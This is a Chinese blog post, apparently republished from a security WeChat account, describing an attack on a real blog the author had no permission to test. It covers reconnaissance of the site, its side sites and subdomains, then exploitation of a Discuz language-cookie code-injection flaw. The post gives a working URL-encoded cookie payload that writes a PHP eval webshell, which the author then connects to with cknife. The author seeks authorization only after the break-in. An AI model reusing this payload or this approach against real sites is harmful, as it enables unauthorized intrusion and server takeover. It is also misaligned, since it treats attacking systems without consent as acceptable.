渗透实战之新洞老用

admin 2022年2月26日14:25:07评论115 views字数 1880阅读6分16秒阅读模式

渗透第一步信息收集还是要的哈。

渗透实战之新洞老用

通过Wappalyzer的检测,操作系统以及使用的容器以及框架已经很明白了,不过兼听则明,肯定是要通过其他手段二次确认一下的啦,毕竟这步出错,后面处理起来就很难受了。

直接丢cms识别,得到结果。

渗透实战之新洞老用

渗透实战之新洞老用

三大手段其下,可以得出目标博客的基本信息:


服务器版本:Ubuntu

 

系统容器:Nginx /1.10.3

 

框架:Bootstarp 3.2.0

 

包含脚本: jQuery/1.11.1

然后就是真实IP,旁站以及C段的查询了。

首先查看目标是否使用了cdn,多地ping

渗透实战之新洞老用

发现目标博客未使用cdn,从而得到目标的IP。

得到IP之后,查询旁站和C段,方便后面提供一个思路

旁站查询:

渗透实战之新洞老用

C段:

渗透实战之新洞老用

对于子域名查询,这个是必须的了。

渗透实战之新洞老用

子域名查询中,发现有几个是没法访问的,不过有个bbs的二级域名是可以访问的,考虑到bbs大多是使用的CMS模板搭建,而且是bbs和博客主站是同IP,访问一波,查看是否有路子可钻。

渗透实战之新洞老用

在页面底部发现CMS信息,Discuz 2.5版本。
等等,好像有个idea,它是英文的,代表它可能是国际版本的discuz,国际版本的discuz在3.2-3.4有个代码注入漏洞,虽然说得是3.2-3.4版本,不过这种低版本一般也是可以试试的吧,反正我又不亏。

渗透实战之新洞老用

直接打开主页/forum.php。
然后打开burp,设置好代理转发之后成功抓到数据包

渗透实战之新洞老用

发现关键字L4tu_2132_language=en,
下一步测试L4tu_2132_language是否对参数进行过滤直接拼接,从而写入缓存文件之中,然后缓存文件随后被加载,造成代码执行。

渗透实战之新洞老用

构造’.phpinfo().’,点击Send,发送数据包请求,点击【Rander】成功看到phpinfo信息。

渗透实战之新洞老用

有戏啊,直接一句话写入。

渗透实战之新洞老用

直接写入不行,编码试试

1

L4tu_2132_language="%27.file_put_contents%28%27good.php%27%2Curldecode%28%27%253c%253fphp%2520eval%28%2524_%2550%254F%2553%2554%255b%2522goog%2522%255d%29%253b%253f%253e%27%29%29.%27"

渗透实战之新洞老用
顺利ok。
cknife连接试试

渗透实战之新洞老用

顺利搞定。
子域名搞定,而且在同IP,直接查看是否存在www的主博客站点目录。

渗透实战之新洞老用

顺利找到,而且之前那几个无法访问的子域名貌似都在。

剩下就是传马提权了,考虑到国家网络安全法的影响,我就不继续进去了,乖巧的跑去请求授权了,可是大佬一直不理我,我也算了,不继续啦。

无意中还发现一枚大表哥,哈哈。

渗透实战之新洞老用

这个经历说明有些新洞,可能低版本的CMS的漏洞代码还是存在的,看到相同的CMS我们都是可以试试,反正不亏。(多看最新漏洞,并且复现,这个很有用的哈)

渗透实战之新洞老用

如对你有,记得转发分享,点个在看哦

点击左下角阅读原文学习更多渗透测试教程


推荐学习教程

CTF网络安全大赛学习从入门到精通教程、工具、writeup合集


2019新版渗透测试工程师攻防就业班视频教程(共计5套)


web渗透测试实战全5套完整版视频教程 推荐学习


渗透测试工程师基础+进阶2套视频学习教程 零基础入门到高手


2018-2019零基础渗透测试web安全攻防网络安全漏洞讲解培训视频教程


Python网络安全编程实战视频教程


2018-2019安卓逆向Android安全反编译脱壳加固IDA调试实战培训教程5套


2019企业级网络安全与等保2.0视频教程【行业剖析+产品方案+项目实战】


web安全从入门到精通视频教程


Wireshark网络分析实践视频教程


全新企业级Linux高端运维实战高薪就业课程高可用架构+负载均衡+企业安全


web渗透之SRC漏洞挖掘视频教程


python从基础到网络爬虫数据分析人工智能机器学习深度学习24套视频教程


IOS逆向与安全学习视频教程


2019新软考网络信息安全工程师备考实战教程 软考安全工程师串讲


【教程】升级版HCIA-Security V3.0认证课程 华为ICT领域网络安全工程师教程


IOS逆向与安全学习视频教程


深度学习之神经网络 CNN/RNN/GAN 算法原理+实战视频教程


2019年新逆向破解学习视频教程  十天入门逆向破解


免责声明

本公众号资源均通过网络等合法渠道获取,该资料仅作为技术学习交流使用,其版权归出版社或者原作者所有,本公众号不对所涉及的版权问题负责。如原作者认为侵权,请留言联系小编,小编立即删除文章,谢谢。



扫描关注乌云安全

渗透实战之新洞老用


渗透实战之新洞老用快戳阅读原文!获取更多视频教程

本文始发于微信公众号(乌雲安全):渗透实战之新洞老用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月26日14:25:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透实战之新洞老用http://cn-sec.com/archives/488853.html

发表评论

匿名网友 填写信息